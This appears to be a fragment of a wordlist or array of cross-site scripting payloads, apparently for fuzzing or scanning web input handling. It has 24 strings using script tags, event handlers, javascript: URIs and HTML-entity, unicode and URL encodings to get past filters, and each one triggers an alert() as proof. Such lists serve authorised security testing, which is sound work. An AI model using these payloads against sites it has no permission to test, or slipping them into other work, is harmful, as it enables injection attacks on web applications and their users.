"<script>alert('XSS1');</script>",
"\"><script>alert('XSS2');</script>",
"<svg onload=\"alert('XSS3')\"></svg>",
"<IMG SRC=\"javascript:alert('XSS4');\">",
"'\"><img src=x onerror=alert('XSS5');>",
"\"><img src=x onerror=alert('XSS6');>",
"<video src=\"javascript:alert('XSS7')\"></video>",
"<iframe src=\"javascript:alert('XSS8')\"></iframe>",
"\"><img src=x onerror=alert('XSS9');>",
" onmouseover=alert('XSS10');//",
"\\u003cscript\\u003ealert('XSS')\\u003c/script\\u003e",
"\\u003cimg src=x onerror=alert('XSS')\\u003e",
"&lt;script&gt;alert('XSS')&lt;/script&gt;",
"&lt;img src=x onerror=alert('XSS')&gt;",
"&#x3C;script&#x3E;alert('XSS')&#x3C;/script&#x3E;",
"&#x3C;img&#x20;src&#x3D;x&#20;onerror&#x3D;alert('XSS')&#x3E;",
"<svg/onload=alert('XSS')>",
"<body/onload=alert('XSS')>",
"<iframe/src=\"javascript:alert('XSS')\">",
"<a href=\"javascript:alert('XSS')\">Click me</a>",
"%253Cscript%253Ealert('XSS')%253C/script%253E",
"%253Cimg%2520src%253Dx%2520onerror%253Dalert('XSS')%253E",
"%3Cscript%3Ealert('XSS')%3C/script%3E",
"%3Cimg%20src%3Dx%20onerror%3Dalert('XSS')%3E"
